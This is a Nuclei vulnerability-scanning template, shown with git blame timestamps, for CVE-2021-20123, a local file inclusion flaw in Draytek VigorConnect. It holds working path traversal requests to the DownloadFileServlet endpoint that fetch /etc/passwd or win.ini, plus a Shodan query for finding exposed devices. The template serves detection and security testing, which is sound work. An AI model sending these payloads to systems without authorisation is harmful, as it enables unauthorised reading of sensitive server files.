nuclei-templates/http/cves/2021/CVE-2021-20123.yaml

58 lines
2.2 KiB
YAML
Raw Normal View History

2022-05-13 09:07:21 +00:00
id: CVE-2021-20123
info:
name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
2022-05-13 09:07:21 +00:00
author: 0x_Akoko
severity: high
description: |
Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B.
2022-05-13 09:07:21 +00:00
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://nvd.nist.gov/vuln/detail/CVE-2021-20123
- https://github.com/ARPSyndicate/kenzer-templates
2022-05-13 09:07:21 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-13 09:07:21 +00:00
cvss-score: 7.5
cve-id: CVE-2021-20123
2023-07-11 19:49:27 +00:00
cwe-id: CWE-22
epss-score: 0.03354
epss-percentile: 0.91162
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: draytek
product: vigorconnect
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"VigorConnect"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,draytek,lfi,vigorconnect,tenable
2022-05-13 09:07:21 +00:00
http:
2022-05-13 09:07:21 +00:00
- method: GET
path:
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-05-13 09:07:21 +00:00
matchers-condition: and
matchers:
2023-07-11 19:49:27 +00:00
- type: word
part: header
words:
- "application/octet-stream"
2022-06-28 03:01:14 +00:00
2022-05-13 09:07:21 +00:00
- type: regex
2022-06-28 03:01:14 +00:00
part: body
2022-05-13 09:07:21 +00:00
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200
# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950